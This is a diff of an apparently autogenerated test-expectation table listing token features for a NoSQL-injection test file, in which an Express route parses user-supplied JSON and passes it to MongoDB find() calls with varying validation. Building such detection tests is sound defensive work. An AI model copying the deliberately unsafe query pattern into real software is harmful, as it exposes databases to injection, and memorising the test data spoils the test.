autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:20 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:20 | type | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:17:10:30 | type: 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:23:10:30 | 'string' | assignedToPropName | type | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:23:10:30 | 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:23:10:30 | 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:10:23:10:30 | 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:13 | title | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:13 | title | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:13 | title | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:9:11:33 | title: ... ring' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:16:11:33 | { type: 'string' } | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:16:11:33 | { type: 'string' } | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:16:11:33 | { type: 'string' } | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:16:11:33 | { type: 'string' } | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:21 | type | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:21 | type | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:21 | type | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:18:11:31 | type: 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:24:11:31 | 'string' | assignedToPropName | type | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:24:11:31 | 'string' | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:24:11:31 | 'string' | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:11:24:11:31 | 'string' | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:9 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:9 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:9 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:9 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv = new Ajv() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv = new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:7:14:21 | ajv = new Ajv() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | exceptional return of new Ajv() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | exceptional return of new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | exceptional return of new Ajv() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | new Ajv() | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | new Ajv() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:13:14:21 | new Ajv() | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:17:14:19 | Ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:17:14:19 | Ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:14:17:14:19 | Ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:17 | checkSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:17 | checkSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:17 | checkSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:17 | checkSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSc ... schema) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSc ... schema) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSc ... schema) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSchema | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSchema | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:7:15:39 | checkSchema | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:23 | ajv | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:23 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:23 | ajv | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:31 | ajv.compile | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:31 | ajv.compile | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:31 | ajv.compile | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | ajv.compile(schema) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | ajv.compile(schema) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | ajv.compile(schema) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | exceptional return of ajv.compile(schema) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | exceptional return of ajv.compile(schema) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:21:15:39 | exceptional return of ajv.compile(schema) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:25:15:31 | compile | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:25:15:31 | compile | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:25:15:31 | compile | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | CalleeFlexibleAccessPath | ajv.compile | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | calleeImports | ajv | @@ -633,6 +3614,76 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:15:33:15:38 | schema | receiverName | ajv | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:17:0 | this | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:17:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:17:0 | this | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:17:0 | this | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:17:0 | this | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | 'arguments' object of function validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | 'arguments' object of function validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | 'arguments' object of function validate | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | 'arguments' object of function validate | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | 'arguments' object of function validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | exceptional return of function validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | exceptional return of function validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | exceptional return of function validate | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | exceptional return of function validate | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | exceptional return of function validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | functio ... null;\\n} | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | functio ... null;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | functio ... null;\\n} | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | return of function validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | return of function validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | return of function validate | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | return of function validate | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:1:19:1 | return of function validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | contextSurroundingFunctionParameters | (x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:10:17:17 | validate | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:17:19:17:19 | x | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:12 | x | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:12 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:12 | x | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:12 | x | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:12 | x | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:20 | x != null | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:20 | x != null | contextSurroundingFunctionParameters | (x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:20 | x != null | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:20 | x != null | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:12:18:20 | x != null | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:17:18:20 | null | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:17:18:20 | null | contextSurroundingFunctionParameters | (x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:17:18:20 | null | enclosingFunctionBody | x x null | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:17:18:20 | null | enclosingFunctionName | validate | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:18:17:18:20 | null | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:3 | app | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:3 | app | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:8 | app.post | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:21:8 | app.post | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | app.pos ... });\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | app.pos ... });\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:1:37:2 | exceptional return of app.pos ... });\\n}) | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:5:21:8 | post | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:5:21:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:5:21:8 | post | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | calleeImports | express | @@ -640,6 +3691,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:10:21:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:28 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:28 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:28 | MongoClient | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:28 | MongoClient | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:28 | MongoClient | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:29 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:29 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:29 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:29 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:21:29 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | 'arguments' object of anonymous function | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | calleeImports | express | @@ -647,6 +3713,59 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | fileImports | ajv express joi mongodb | | autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | (req, r ... });\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | exceptional return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | exceptional return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | exceptional return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | return of anonymous function | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | return of anonymous function | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:29:37:1 | return of anonymous function | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:30:21:32 | req | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:35:21:37 | res | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:35:21:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:35:21:37 | res | enclosingFunctionBody | req res MongoClient connect mongodb://localhost:27017/test err db doc db collection doc query JSON parse req query data checkSchema query doc find query ajv validate schema query doc find query validate query doc find query doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:35:21:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:21:35:21:37 | res | fileImports | ajv express joi mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:15 | MongoClient | contextFunctionInterfaces | validate(x) | +| autogenerated/NosqlAndSqlInjection/untyped/json-schema-validator.js:22:5:22:15 | MongoClient | contextSurroundingFunctionParameters | (req, res) | +| 